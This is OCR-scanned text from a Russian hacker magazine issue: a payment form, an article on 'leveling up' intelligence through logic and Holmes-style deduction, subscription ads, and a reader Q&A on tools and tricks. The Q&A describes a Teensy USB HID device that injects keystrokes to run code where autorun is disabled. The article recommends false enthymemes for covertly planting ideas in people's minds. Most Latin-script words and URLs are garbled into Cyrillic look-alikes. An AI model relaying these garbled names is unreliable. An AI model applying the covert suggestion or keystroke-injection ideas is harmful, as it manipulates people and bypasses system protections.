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к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 









Оксана «Огіуапа» Андреева огіуапаШхрзусІіо.ги 




Р8ѴСН0: 

НА ПУТИ К СОВЕРШЕННОМУ ИНТЕЛЛЕКТУ 

Советы по прокачке майндовыхскиллов 



«$тагІНа$ІНеЬгаіп$,$иірісІІіа$ІІіеЬаІІ$», — утверждает рекламная кампа- 
ния Оіезеі. Это все — утешение для глупых. На самом деле «Ьаііз» 
имеютпочти все представители мужского пола, а вот«ЬаІІ5» в со- 
четании с«Ьгаіпз» — это то, чему стоит позавидовать. Если с послед- 
ним ты чувствуешь напряг — не переживай, все поправимо. 



«Умным быть не модно», — наверное, ты 
не раз слышал эту фразу. Не злись на автора 
изречения, сам того не понимая, он сказал 
правду: высокий интеллект всегда был, есть и 
будет вне моды — это классика. Умные люди 
часто бывают неудобными для остальных, 
ведь ими управлять и манипулировать намно- 
го сложнее, чем неумными. Стандартная 
система образования всегда старалась урав- 
нять высоко и низко интеллектуальных детей, 
ведь зачем лелеять высокие умы, которые 
потенциально опаснее, чем все остальные. 

Мой мир начинается со школы. Я умнее 
большинства других детей; та чушь, кото- 
рой учат нас в школе, скучна. 

Чертов недоносок... Они все одинаковы. 

Я в средних или старших классах. Слушаю 
учительницу, которая в пятнадцатый раз 
объясняет, как сокращать дробь. Да понял 
я уже. «Нет, Марь Иванна, я не покажу вам 
мою работу. Я сделал ее в уме...» 

Чертов ребенок, наверняка списал. Они все 
одинаковы. 

Манифест хакера 

Тебе приходилось видеть реакцию учителя, 
когда ученик выдавал более рациональный 
подход к решению задачи? Мудрый учитель 
радуется и гордится таким учеником, для 
обычного же это может стать трагедией. 

На этом, пожалуй, минусы заканчиваются. 
Теперь о плюсах: высокий интеллект дает 
тебе массу преимуществ перед другими 

ЛЮДЬМИ: 



• устойчивость к манипуляциям; 

• поиск и нахождение эффективных стратегий 
и решений; 

• возможность поставить себя на место 
любого человека (развитый интеллект и 
наблюдательность дают даже такие способ- 
ности); 

• нестандартный взгляд на вопрос и, как 
следствие, оригинальность, эффективность, 
отсутствие конкуренции; 

• интуитивное понимание сложных схем и 
устройств (как технических, так и человече- 
ских ИЛИ любых других); 

• умение найти подход к человеку, пробле- 
ме, ситуации, заданию; 

• обход правил, если они тебе невыгодны... 
Список можно продолжать бесконечно. 
Перед истинно умным человеком открыва- 
ются все двери. 

Умозаключения явные 
и воображаемые 

В теме про развитие интеллекта грешно 
было бы не упомянуть различные виды 
логических умозаключений. Традиционно 
их выделяют три: дедукция (от общего к 
частному), индукция (от частного к общему) 
и трансдукция (по аналогии). Но поскольку 
мы все — брутальные дети Калиюги и пле- 
вать хотели на условные разделения, будем 
смотреть на все реально. А реальность ока- 
зывается достаточно размытой и нечеткой: 
если считать умозаключением вывод, осно- 
ванный на предпосылках, то трех условно- 
стей (дедукция, индукция и аналогия) явно 



недостаточно, ведь выводы иногда делаются 
на основе чего угодно, вплоть до галлюци- 
наций (да-да, в наш-то век...). 

Трансдукция 

У Пети и Васи полностью совпадают черты 
характера А, В и С. Соответственно, если мы 
знаем, что у Пети есть еще черты Е, Н и К, то 
можно предположить, что у Васи эти черты 
тоже есть. На этом принципе основан самый 
распространенный глюк человеческой пси- 
хики — проекция — когда мы, основываясь 
на своем опыте, начинаем приписывать свои 
мотивы или рассуждения всем остальным 
людям. Например, если ты не понимаешь 
и не принимаешь того, что можно открыто 
выражать свои эмоции на людях, значит, 
точно так же к этому должны относиться и 
остальные, а соответственно, публичное 
выражение эмоций не имеет права на 
существование. А Петя из соседнего отдела 
об этом не догадывается, он в это время 
заморочен тем, как наиболее ярко произ- 
вести эмоциональное впечатление на Машу, 
которая работает этажом ниже. Беда в том, 
что у Маши совсем другой глюк — она не 
доверяет никому, и Петины эмоциональные 
всплески, и твои аристократические отмора- 
живания она воспринимает как попытку вте- 
реться в доверие и обмануть. Как видишь, 
из-за проекции своих особенностей на дру- 
гих людей мы сами перекрываем себе и им 
возможности открыто и эффективно взаимо- 
действовать друг с другом. Умозаключение 
по аналогии я считаю очень субъективным 
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и неточным, оно годится скорее для кон- 
статации уже известных фактов; если же от 
твоего взгляда скрыто 70-80% информации, 
вывод может быть ошибочным. Например, 
какого пола человек со стройным спортив- 
ным телосложением, густыми черными бро- 
вями, густыми черными волосами, неболь- 
шими черными усиками, широкой нижней 
челюстью...? Это Сальма Хайек. В описании 
мы опустили всего лишь половые признаки, 
при этом картина изменилась кардинально, 
благодаря следующей аналогии — все пере- 
численное свойственно чаще мужчинам, 
чем женщинам. При этом красавицу Сальму 
мужчиной ну никак не назовешь. 

Как видишь, аналогия вполне годится для 
того, чтобы немного пошевелить извилина- 
ми, но совсем не годится для нахождения 
единой истины. 

Индукция 

Более совершенный метод, чем аналогия; 
он подразумевает достижение результата 
путем анализа частных моментов, которые 
логически должны приводить к общему 
результату. Если исключить теорию о полной 
и неполной индукции и сконцентрироваться 
на практике, то для получения более или 
менее вероятного вывода можно использо- 
вать три вида индукции: 

Первый вид. Через простое перечисле- 
ние (метод селекции): берем однородные 
понятия (объекты, случаи), анализируем их 
общие черты и при отсутствии исключений 
делаем вывод. Например, этот автор софта 
пишет хорошо работающие спамеры, авто- 
регеры, парсеры, чекеры, инвайтеры; ты 
не встречал ни одной жалобы на него, ни 
одного сбоя в программах; соответственно, 
ты делаешь вывод, что он хороший кодер, и 
его можно привлекать для написания более 
сложного софта. 

Второй вид. Через исключение (элимина- 
цию): чтобы подтвердить высокое качество 
программной продукции, выбираем один из 
множества написанных конкретным кодером 
чекеров, один из множества спамеров (и так 
далее) и проверяем их качество; если про- 
верка показала высокий уровень чекера, но 
при этом спамер написан криво, мы делаем 



вывод, что чекеры он пишет хорошо, а спа- 
меры — плохо. Другими словами, на основе 
анализа частных случаев делаем вывод об 
общей группе. Как видишь, метод не особо 
точный. 

Третий вид. Научная индукция: для того, 
чтобы удостовериться в профессионализме 
кодера, мы берем софт, написанный им в 
разное время, разной сложности, на разных 
языках программирования; проанализи- 
ровав программные продукты на наличие 
багов, рентабельность, поддержку, мы 
делаем обдуманный вывод. Метод более 
энергозатратный, но показывает более точ- 
ную картину. Индукция состоит в том, что мы 
не можем проверить абсолютно весь софт, 
написанный автором, поэтому берем много 
единиц софта (частное), каждая из которых 
представляет определенную характеристику 
(время, язык, сложность написания, ресур- 
созатратность), и полученный путем анализа 
вывод распространяем на все единицы каж- 
дой характеристики (общее). 

К сожалению, индукция не утверждает, а 
предполагает. 

Дедукция 

Этот вид умозаключения предлагает нам, 
опираясь на характеристики, присущие 
общему (группе, виду), приписать те же 
характеристики каждой из единиц, входя- 
щих в группу (не путай с аналогией); или, 
зная характеристики общего явления, логи- 
чески понять, как оно скажется на частных. 

В отличие от индукции, где истинные пред- 
посылки могут привести к предполагаемому 
выводу, здесь истинные предпосылки при- 
водят к истинному заключению. 

Но еще одно отличие дедукции состоит в 
том, что она оперирует уже известными 
утверждениями. В логике синоним дедукции 
— доказательство. 

Например, Вася программирует только на 
Питоне, но статья, которую он написал в ][, 
об А5Р.ЫЕТ; следовательно, делаем вывод, 
что статью писал не он. То есть идем от 
общего (Вася программирует только на 
Питоне) к частному (статья о другом языке 
программирования) и делаем логический 
вывод. Дедукция тоже может давать сбои, 



если посылки не истинны, и в данном 
случае можно предположить, что Вася 
очень быстро выучил А8Р.ЫЕТ или знал его 
раньше, просто мы были об этом не осве- 
домлены. 

Дедуктивный метод 
Шерлока Холмса — 
такой ди уж дедук- 
тивным? 

На смену Хаусу пришел старый герой нового 
поколения — дерзкий, безэмоциональный 
и шибко умный мизантроп Шерлок Холмс. 

Не то чтобы он был полностью забыт, но 
бравые режиссеры Гай Ричи («Шерлок 
Холмс», 2009) и Пол МакГиган (мини-сериал 
«Шерлок», ВВС, 2010) решили пересмотреть 
личность детектива и подать его под новым 
соусом безапелляционности, дерзкости, 
невозмутимости и совершенства (вспоми- 
наем Доктора Хауса и маленького злобного 
Фримена; если не понял, о чем речь, пере- 
читай статью «Черное искусство растления 
душ» в июньском номере ][). Действительно, 
современный герой, прототипом которого 
стал профессор медицины Эдинбургского 
университета Джозеф Белл, вызывает вос- 
хищение своим умением быстро и четко, 
подобно роботу, составить полную картину из 
каких-то незначительных и едва заметных 
деталей. 

По ногтям человека, по его рукам, обуви, 
сгибу брюк на коленях, по утолщениям 
кожи на большом и указательном пальцах, 
по выражению лица и обшлагам рубашки 
— по таким мелочам нетрудно угадать его 
профессию. И все это вместе взятое под- 
скажет сведущему наблюдателю верные 
выводы. 

«Этюд в багровых тонах» 

Благодаря Конан Дойлу понятие дедукции 
из узких профессиональных кругов вышло 
на широкую арену, став популярным и даже 
модным — сейчас миллионы поклонников 
Холмса тренируют свои дедуктивные спо- 
собности, даже не подозревая, что это не 
совсем дедукция (вот куда можно зайти, 
если безропотно верить всему, что тебе 
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Сцена из «Шерлока Холмса», где герой вырубил более сильного против- 
ника в том числе благодаря блестящей логике 



говорят). Многие из них действительно 
думают, что вглядываясь в лицо прохожего, 
можно сказать, что он ел на завтрак... А 
что, если мы снимем розовые очки и более 
трезво посмотрим на звездный талант гени- 
ального сыщика? Из чего состоит этот яркий 
образ? 

1. Метод Холмса, известный как дедукция, 
на самом деле больше напоминает индук- 
цию: отталкиваясь от мелких деталей (част- 
ного), он приходит к общему заключению. 



Иногда встречается более сложный рекур- 
сивный метод (индукция + дедукция). Давай 
рассмотрим небольшой пример, когда Холмс 
признается Ватсону, как он его сканировал 
при первой встрече («Шерлок», ВВС): 

• У Вас стрижка и выправка военного (у 
всех военных короткая стрижка и такая 
выправка, у Ватсона тоже — соответственно, 
он военный. Дедукция). 

• Загорелые лицо и кисти рук — были за 
границей, но не загорали (загар — признак 



посещения солнечной страны; загар только 
на открытых участках тела — поездка не для 
отдыха, а по работе или заданию. Индукция 
+ дедукция). 

• Войдя, сильно хромали, но стул не попро- 
сили, стояли, будто забыв о ноге. Выходит, 
боль психосоматическая; значит, обстоя- 
тельства ранения травмируют, то есть рана 
получена в бою (частные детали приводят к 
общему выводу — индукция). 

• Боевое ранение, загар... Афганистан или 
Ирак. (Индукция). 

2. Тренировка мозга. Думаешь, Холмс с 
рождения был так умен и опытен? Конечно, 
нет; природа дает нам кредит доверия в 
виде зачатков интеллекта, но в осталь- 
ном — как поработаешь, то и получишь. 

Так что при желании и упорстве можешь 
стать таким же, как великий детектив. 
Постоянное обучение новому, сознатель- 
ное внимание к деталям, поиск возможных 
взаимосвязей между событиями... а также 
активизация работы мозга с помощью 
стимуляции кончиков пальцев, на которых 
находятся нервные окончания, отвечающие 
за разные органы и процессы в организ- 
ме. Для этого можно использовать четки, 
но эффективнее — игра на скрипке. Как 
человек, с 6 лет играющий на скрипке, могу 
сказать, что в действительности роль играет 
не только воздействие на кончики пальцев, 
но и размещение их на грифе и струнах: 
малейший наклон пальца, стоящего на 
одном месте, дает новую ноту и режет слух. 
Вибрация, трель (левая рука), легато, стак- 



• МЕТОДЫ ПРОКАЧКИ ИНТЕЛЛЕКТА 



Мозг, отвечающий за интеллект, 
память, интуицию, внимание, 
наблюдательность, можно про- 
качивать, как любую мышцу тела. 
Конечно, физические упражне- 
ния хорошо сказываются на нем, 
так как улучшают приток крови к 
голове, но основная задача при 
развитии состоит не в этом. 

В отличие от общепринятого 
мнения, клетки мозга все- 
таки восстанавливаются, и это 
на опытах доказали ученые. 
Способности интеллекта сни- 
жаются не потому, что умирают 
нервные клетки, а из-за ослабе- 
вания возможностей дендритов 
проводить импульсы от одной 
клетки к другой; соответственно, 
цель — создать как можно боль- 
ше связей между нейронами. 
Когда делаешь что-то по при- 
вычке, мозг перестает анали- 
зировать действия, его работа 
замедляется. И наоборот, чем 
больше новых событий, требую- 
щих навыков приспособления, 
тем активнее клетки включаются 



в работу, создавая при этом 
новые соединения между собой. 
Итак, что делать для прокачки 
мозга? Тренировать его. 

1. Займись нейробикой (аэро- 
бика для мозга), суть которой 

- менять себя и все вокруг себя. 
Конкретных упражнений нет, ты 
их можешь создавать сам, следуя 
основным правилам: 

- задействовать несколько орга- 
нов чувств; например, когда бре- 
ешься, закрой глаза и полностью 
погрузись в осязание; 

- вовлекать все виды внимания; 
отлично подойдет смена рас- 
кладки клавиатуры с «ОѴѴЕПТѴ» 
на алфавитную, и при этом вслу- 
шивайся в слова песни орущего 
рядом радио; 

- будет классно, если получится 
изменить течение событий дня: 
например, новый маршрут. 

2. Находи взаимосвязи между 
любыми событиями, вещами или 
мыслями, даже если они будут 
притянуты за уши. Мой личный 
рецепт: когда идешь одним и тем 



же маршрутом, каждый привыч- 
ный объект ассоциируй с чем-то. 
Пример: сегодня это здание 
ассоциируется с фильмом «Убить 
Билла» (должно быть понимание, 
почему возникла ассоциация), 
этот магазин — с фильмом 
«Ночной продавец», а это дерево 

— с «Элвин и бурундуки». Завтра 
это же здание ты ассоциируешь с 
прошлым отпуском (ассоциация 

с событием), магазин — с пред- 
стоящей вечеринкой, дерево — с 
текущим отчетом. Послезавтра 

— ассоциации с людьми, и так 
далее. 

3. Постоянно осваивай новые 
виды деятельности, учись. 

Новый язык программирования, 
перепаивание конденсаторов на 
платах, уход за черепашкой, ита- 
льянский язык — неважно, что; 
главное, чтобы процесс обучения 
продолжался. 

4. Путешествуй; это могут быть 
далекие страны с другим мен- 
талитетом, новые тусовки со 
своими правилами, общение с 



людьми разного возраста или 
религиозных убеждений. Цель — 
приспособиться, влиться, стать 
«своим». Во время приспосо- 
бления активно задействуются 
внимание, анализ, память, вос- 
приятие, воспроизведение, под- 
ражание и другие функции мозга. 

5. Медитация «Тратака». Это 
древнее йоговское упражне- 
ние помогает достичь полного 
сосредоточения сознания. 
Техника: пристально, не моргая, 
вглядываешься в стоящий на 
уровне глаз яркий предмет (тра- 
диционно это зажженная свеча). 
Потом закрываешь глаза и вос- 
производишь перед внутренним 
взором эту же свечу, в точности 
восстанавливая все детали: 
расплавившийся воск, колышу- 
щееся пламя... При правильном 
исполнении все фоновые мысли 
отсекаются, сознание становится 
кристально чистым — в итоге ты 
даже физически почувствуешь 
изменившиеся ощущения в 
мозгу. 
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Шахматы — один из наиболее известных способов развития 
прогностической функции сознания 




Глупость — это пробы и ошибки. В основном, ошибки 



като, пиццикато (правая рука] — как методы 
извлечения звука смычком, продумывание 
удобства сочетания нот на 1 ,2,3,4 позициях 
и т.п. отлично развивают мозговые про- 
цессы. 

3. Наблюдательность. Без нее дедукция 
с индукцией в случае с Холмсом так и не 
понадобились бы. Поначалу, когда пыта- 
ешься развить в себе это качество, полу- 
чаешь только массу никак не связанных 
деталей, и это понятно, ведь вся опера- 
тивная память мозга направлена на выис- 
кивание мелочей. Но когда внимательность 
становится привычкой, и ты автоматически 
начинаешь замечать, что, например, бух- 
галтерша Леночка и сисадмин Антон как-то 
странно переглядываются, у нее невыспав- 
шийся вид и такая же, как и вчера, одежда, 
а от него немного веет Леночкиными духа- 
ми... Едва заметные детали складываются 

в целостную картину. Это как раз тот слу- 
чай, о котором мы говорили выше — мозг, 
как и любой орган, можно тренировать. 

4. Экспертные знания. Только будучи 
опытным профессионалом, можно уловить 
совсем тонкие нюансы, которые, возможно, 
предопределят дальнейший ход мыслей 
или выведут из аналитического тупика. 

Ведь не зря доктор Хаус собирал всю 
свою команду и устраивал брейнсторминг: 
иногда самые нелепые и недопустимые 



идеи могут оказаться истинными. Если ты 
хочешь быть сыщиком, придется освоить 
медицину, баллистику, физиогномику, исто- 
рию и культурологию, физику, химию и т.п. 
Если же тебе нужна только твоя «родная» 
сфера деятельности, то займись глубо- 
ким изучением ее и смежных дисциплин. 
Конечно, физиогномика и культурология 
тоже не помешают. 

5. Интуиция. Хорошо развитая интуи- 
ция дает на порядок меньше сбоев, чем 
хорошо развитая логика. Почему? Потому 
что логика — производная сознания, а 
интуиция — бессознательного, а бессозна- 
тельное, как ни крути, «знает» и «помнит» 
больше. Я не раз сталкивалась с тем, как 
люди с помощью интуиции делали неверо- 
ятно точные выводы, обладая минималь- 
ной информацией; некоторые из них объ- 
ясняли это анализом, но когда я просила 
озвучить логическую цепочку, приводящую 
к конечному заключению, в ход шли какие- 
то несуразные и притянутые за уши объяс- 
нения, после чего становилось очевидно, 
что решающую роль сыграла все-таки 
интуиция. 

В случае с Холмсом я уверена, что без инту- 
иции не обошлось, ведь имея пару незна- 
чительных улик, можно развивать рассле- 
дование в каком угодно направлении, а их 
тысячи, и каждое из них можно обосновать 



логически. Пока аналитически раскрутишь 
все возможные варианты, искомое заключе- 
ние может уже не понадобиться. Но в боль- 
шинстве случаев он шел по тому пути, кото- 
рый приводил к раскрытию преступления. 
Другое дело, что у человека с кристальным 
умом обращение к интуиции маскируется 
под сухой анализ и калькуляцию. 

6. Эпик фейлы. Даже легендарный 
Шерлок не избежал этой участи, и вряд 
ли кто-то сможет избежать, потому что в 
ходе холодного рассуждения обязательно 
встретится дилемма, где два-три варианта 
развития окажутся одинаково вероятными, 
и ты автоматически выберешь тот, который 
тебе ближе, или вообще не предусмотришь 
пару-тройку. Показательным примером 
является эпизод из «Холмса» Гая Ричи, 
где наш герой с другом Ватсоном и его 
пассией (Мэри Морстен) сидели в ресто- 
ране. Зная о таланте Холмса, женщина 
сама попросила рассказать что-нибудь 
о ней, и очень скоро пожалела об этом: 
гений дедукции выдал до неприличного 
подробное сканирование, допустив ошибку 
при интерпретации. «Светлая полоска на 
пальце указывает на то, что за границей 
Вы с гордостью носили кольцо, пока не 
узнали истинной его ценности, после чего 
расторгли помолвку и приехали сюда. 

Ради более выгодной партии — доктора 
Ватсона». Закончить не успел, так как 
захлебнулся выплеснутым в лицо вином 
из бокала дамы. Оказалось, что она вдова. 
Профессиональная деформация и опыт 
общения с преступниками сыграли злую 
шутку при контакте с обычным человеком. 
Вот так вот... Иногда все гениальное про- 
сто, и совсем необязательно в поступках 



Если верить трансдукции, то этих 
двух красоток можно причислить 
к особям мужского пола 
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Нахождение ошибки 
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Схема процесса отладки 
методом дедукции 

людей искать что-то скрытно-преступно- 
корыстное. 

Обходим правила 
формальней логики 

Ты уже знаешь, что в процессе доказа- 
тельства мы берем различные факты и 
реалистичные суждения, строим логические 
цепочки из них, в итоге доказывая истин- 
ность своего утверждения. Вроде все по 
правилам, но... как-то неубедительно и про- 
сто. К счастью, кроме доказательства, есть 
еще понятие «убеждение», которое иногда 
может идти вразрез с правилами формаль- 
ной логики, будучи более эффективным. 

В доказательствах мы часто используем 
силлогизмы (пример: все общедоступные 
сплоиты со временем теряют свою эффек- 
тивность. Этот сплоит уже давно попал в 
паблик, соответственно, его эффективность 
низка). Но можно также проводить іщесбоп 



в подсознание, используя энтимему. В этом 
виде силлогизма одна из посылок (частей 
доказательства) или заключение пропу- 
скается, причем пропущенная часть как бы 
подразумевается. С точки зрения психоло- 
гии, именно она откладывается в подсозна- 
нии и при удачно подобранном «упущении» 
остается там в виде своеобразного вируса. 

В качестве примера для классической 
энтимемы можно привести анекдот: в 
больницу поступает сильно покалечен- 
ный человек. «Женаты?» — спрашивает 
медсестра при заполнении карты. «Нет- 
нет, я просто попал под автомобиль». В 
этом случае умалчивается, но подразуме- 
вается то, что мужчину могла избить 
жена, а для того, чтобы было смешно, 
использована подмена смыслов. По идее, 
пропущенная часть должна логически 
связывать одну из посылок с заключе- 
нием, но хитрость в том, что нарушая 




Осознанная игра на скрипке 
ничуть не хуже, чем шахматы, 
активизирует логическо- 
аналитические процессы в мозгу 

истинность энтимемы, можно повысить 
эффективность внушения. 

Ложные энтимемы в полную силу использу- 
ет реклама: «Подсолнечное масло «АВС»! 
Покажите свою любовь и заботу близким!» 

С точки зрения логики эта энтимема не 
выдерживает никакой критики... Однако 
именно между первой и второй фразой есть 
целый пласт скрыто внушаемой информа- 
ции: «Подсолнечное масло «АВС» — самое 
лучшее и качественное. Когда человек 
любит кого-то, он стремится сделать для 
объекта своей любви все самое лучшее. 
Покупая масло, вы делаете для своей семьи 
самое лучшее, соответственно, вы их люби- 
те». Этот пример простой и шаблонный, 
но если ты — хакер и схема инъекций тебе 
знакома, ты без особого труда сможешь 
придумать свои эффективные схемы неза- 
метного внедрения нужной информации в 
подсознание собеседника. 

Умным быть модно? 

Как видишь, быть умным — совсем не зануд- 
ство, как это хотят представить некоторые. 
Это, как минимум, интересно, эффективно и 
полезно, не говоря уж о безграничных воз- 
можностях, которые открываются благодаря 
хорошим умственным способностям. Если 
такая перспектива тебе нравится больше, 
чем быть зШрісШипку, дерзай — в этой 
статье есть все необходимые инструменты 
и примеры. И, конечно же, читай ][ — это 
хорошая тренировка для мозга, в конце 
концов, есть классный закон нового време- 
ни — зтагі із а пеѵѵ зеху :). тг 
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■мят ммт иччю 

ЪідіІаІРНоЮ I 




б номеров 564 руб. 
13 номеров 1105 руб. 



6 номеров 785 руб. 
12 номеров 1420 руб. 



6 номеров 1110 руб. 
12 номеров 2016 руб. 



6 номеров 81 0 руб. 
12 номеров 1470 руб. 







6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 



6 номеров 1 260 руб. 
12 номеров 2310 руб. 



6 номеров 900 руб. 
12 номеров 1720 руб. 



6 номеров 1 300 руб. 
1 2 номеров 2300 руб. 



ПОДПИШИСЬ! 

$Нор.дІс.ги 



ВЫГОДА + ГАРАНТИЯ 

Редакционная подписка без посредников - это 
гарантия получения важного для Вас журнала и 
экономия до 40% от розничной цены в киоске 

8 - 800 - 200 - 3-999 




6 номеров 1130 руб. 
1 2 номеров 2060 руб. 



6 номеров 890 руб. 
12 номеров 1630 руб. 




6 номеров 960 руб. 
12 номеров 1740 руб. 



6 номеров 1 300 руб. 
1 2 номеров 2300 руб. 




6 номеров 630 руб. 
12 номеров 1130 руб. 




3 номера 630 руб. 

6 номеров 1140 руб. 



б номеров 765 руб. 
12 номеров 1380 руб. 




6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 




6 номеров 2205 руб. 
1 2 номеров 3890 руб. 



6 номеров 21 50 руб. 
1 2 номеров 3930 руб. 



6 номеров 21 78 руб. 
1 2 номеров 3960 руб. 



(дате)іамі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 
















Есть вопросы — присылай 
на Іад@геаІ.хакер.ги 



О: Меня часто разные люди спрашива- 
ют — как восстановить случайно уда- 
ленный файл. Не знаю, что отвечать. 
Ведь не рекомендовать же чайникам 
К-5бисІіо. Инструмент отличный — спору 
нет, но он платный и требует некото- 
рого понимания процесса. Подскажи, 
какая прога была бы понятна любой до- 
мохозяйке, удалившей файл и захотев- 
шей его сразу восстановить. Без лишней 
возни и слез. 

А: Смею предположить, что домохозяйка, 
скорее всего, сидит под виндой. В этом случае 
идеальный вариант — бесплатная программа 
ІЧТЕ5 Ііпсіеіеіе [ ѵѵѵѵѵѵ.п^гипбеіеіе.сот ). Она не 
сильно отличается от какого-нибудь проводни- 
ка: выбрав диск, утилита быстро просканирует 
таблицы файловой системы и покажет все 
недавноудаленные файлы. Несколько кликов 
мыши — и выбранные данные будут восста- 
новлены вуказанное место. Конечно, это не 
профессиональный инструмент для восста- 
новления данных (кактотже самый Р-Біисііо), 
но в большинстве случаев, когда необходимо 
оперативно восстановить случайно удаленный 
файл, ІЧТЕ5 Ііпбеіеіе справится блестяще. 

Тут главное не забыть, что «трогать» диск, где 
находятся удаленные файлы, нельзя. Поэтому 
и устанавливать программу, и восстанавли- 
вать данные необходимо в какое-то другое 
место. Под І_іпих и МасОБ (впрочем, каки под 
ѴѴіпсІоѵѵз) можнотакже воспользоваться утили- 
той РЬоІоНес ( ѵѵѵѵѵѵ.сдзесигііѵ.огд ). 



О: Хочу отреверсить протокол взаимо- 
действия между компьютером и одним 
необычным устройством, подключен- 
ным к нему по 115В. Как это сделать? 

А: Понятно, что единственный способ — 
изучить данные, которые передаются между 
компьютером и устройством. Для этого есть 
специальные программы-сниферы. Напри- 
мер, ІІБВТгасе [ ѵѵѵѵѵѵ.зѵзписіеиз.сопп ] или 115В 
МопіІоН ѵѵѵѵѵѵ.бМзобѵѵаге.сот ]. Обеутилиты 
умело мониторятвсетранзакции схост-конт- 
роллером, ІІ5В-хабами и девайсами. Если по 
какой-то причине (из чистого любопытства или 
с конкретной целью — например, реверсин- 
га)тыхочешьузнать, какпроисходитобмен 
данными между подключенным к компьютеру 
устройством и операционной системой (а 
вернее, соответствующим драйвером), то эти 
утилиты — то, что доктор прописал. Анало- 
гичный инструмент, кслову, был использован 
для реверсинга нового гаджета отМісгозоб 
— Кіпесі. На основе отснифанныхданныхбыл 
разработан открытый драйвер ОрепКіпесІ 
( орепкіпесбогд ). 

О: Как найти программу или процесс, 
которая блокирует некоторый файла в 
системе? 

А: Для этого стоит взять на вооружение про- 
грамму Ргосезз Ехріогегиз набора системных 
утилит Марка Руссиновича. С ее помощью для 
любого процесса можно получить список ОІ_І_ 
и хэндлов, которые с ним связаны. Но самое 



полезное в нашей ситуации — это функция 
поиска. Чтобы выяснить, кто блокируетфайл, 
достаточно ввести часть его пути и таким обра- 
зом найти все процессы, которые работаютс 
подходящими по маске объектами в системе. 

О: Слышал, что с помощью 55Н можно 
получить доступ не только к консоли 
удаленной машины, но и к графичес- 
ким приложениям. Подскажи, как это 
сделать? 

А: Да, действительно, существует та кая 
возможность. Допустим, у нас есть удаленный 
комьютерсЫпихи машина с ѴѴіпсІоѵѵз. 

1. Прежде всего надо сконфигурировать ззб- 
демон наудаленной машине для форвар- 
дингаХ1 1 : для этого достаточно прописать в 
конфиге /еІс/ззЬ/ззМ-Сопбд строчку «Епзиге 
X1 1 Еогѵѵагсііпдуез». 

2 . После этого устанавливаем на ѴѴіпсІоѵѵз- 
машинелокальныйХ-сервер, например, 

Хтіпд ( ѵѵѵѵѵѵ.зІгаідЬігиппіпд.сот/ХппіпдМоІез ). 
Запускаем его и переходим в настройки, где 
находим раздел «Оігріау». Здесь необходимо 
установить параметр «МиШрІе ѵѵіпсіоѵѵз апб зеі 
бзе Оізріау» равным нулю. 

3. Далее понадобится любимый нами 55Н- 
клиентРиТТѴ. Запускаем его и переходим в 
настройки «Соппесбоп -> 55Н ->Х1 1». Вклю- 
чаем опцию«ЕпаЫеХ1 1 бо гѵѵа гсі і п д » и в поле«Х 
сіізріау Іосабоп»указываем «:0.0». 

4 . Все, теперь можно открывать новую сессию 
судаленной машиной, какты это делаешь при 
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Простое восстановление удаленных файлов с помощью N175 Ііпсіеіеіе 



обычном подключении поЗЗН-протоколу. 
Логинимся в систему и через консоль пробуем 
запустить ОШ -приложен ия (например Рі гебох) . 
Все должно работать. 

О: Есть ли способ автоматически запус- 
тить авторан с ІІБВ-флешки (с произ- 
вольным ехе-файлом), если в системе 
любой автозапуск грамотно отключен? 

А: Самым прогрессивным способом, который 
был представлен на последнем ОеРсоп'е, яв- 
ляется Теепзу 115В НЮ Айаск Ѵесіог. Эта атака 
основывается на использовании гибрида 
обычной флешки и микроконтроллера, кото- 
рый эмулируетввод с клавиатуры. Вернемся 
к нашим исходным данным: если автозапуск 
отключен, то обращения кфайлуаиіогип.іпі'во 
время монтирования флешки не происходит 
и код автоматически не выполняется. Новый 
подход обхода этого ограничения основывает- 
ся на использовании крошечного ЫЗВ-девай- 
са, построенного на базе простого микроконт- 
роллера, который определяется в системе как 
НЮ-устройство (Нитап Іпіегівсе Оеѵісе). Таким 
образом эмулируется необходимая последова- 
тельность нажатия клавиш и движения мыши, 
чтобы выполнить автозапуск. Слово «микро- 
контроллер» может испугать, но на самом деле 
заготовку (Теепзу 115В Воагб) можно приоб- 
рести всего за $1 8, а залить в нее необходимую 
программу не со ста вит труда. Все подробности 
описаны на сайте ЬіІ.Іу/ргодгатппаЫе-ЫсІ-изЬ- 
кеѵзігоке-сіопдіе . 

О: Есть ли способ синхронизировать 
документы МісгозоТЮНісе и Соодіе 
йосз? Уж больно надоедает каждый раз 
их вручную заливать на сервер. Хочет- 
ся использовать привычный «офис», 
но размещать документы в облачном 
хранилище от Соодіе. 

А: Я лично давнотак и делаю, используя 
0Ш5упс( іупс.сот ]. Это специальный 



плагин для Місгозо^ ОШсе, который реализует 
именното, что нужно — связывает между собой 
Місгозо^ бДісе и боодіе йосз. После установки 
в офисных приложениях появляется новый 
тулбар, с помощью которого и реализуется син- 
хронизация с серверами боодіе. Что это дает? 
Возможность обращаться кфайлам, находя- 
щимся в облаке, и коллективно работать над 
документами в режиме реального времени. 
Кстати, в официальном блоге боодіе появилось 
сообщение, что компания сама близка креа- 
лизации аналогичного инструмента (рабочее 
название — боодіе біоисі боппесі), но пока он 
находится в стадии закрытого тестирования. 
Для брепбШсетакже есть похожее решение, я 
говорю об ооо2дб І сосІе.доодІе.сопп/р/ооо2дсІ ). 
Последний умеет работать не только с боодіе 
йосз, но еще и с сервисом 2оЬо ( ѵѵѵѵѵѵ.гоЬо. 
сот ), а также собственным ѴѴеЬбАѴ сервером 
(на случай, если недоверяешьсторонним 
сервисам). 

О: Есть ли способ узнать, какие Рігеіох- 
расширения установлены на удаленном 
браузере пользователя? 

О: Последний публичный багв огненном 
лисе, который позволял выполнитьтакой 
бпдегргіпбпд, был исправлен еще в 2008 году, 
буть используемой тогда техники хорошо 
описана в блоге исследователя из команды 
ѴѴЬіІеНаІ Зесигііу ( іегеппіаЬдгоззппап.ЫодзроІ. 
сот^ООб/ОЗ/і-кпоѵѵ-ѵѵЬаІ-уоиѵе-доІ-РгеІюх. 
Мші). бейчас ни одного универсального 
способа определить установленные аддоны 
не существует. Я, конечно, не беру в расчет 
случай, когда сам плагин хочет стать видимым 
и, к примеру, добавляет в хедер ІІзег-АдепІ 
какой-то особый модификатор. Присутствие 
некоторых плагинов можнотакже выявить, 
если они особым образом модифицируют стра- 
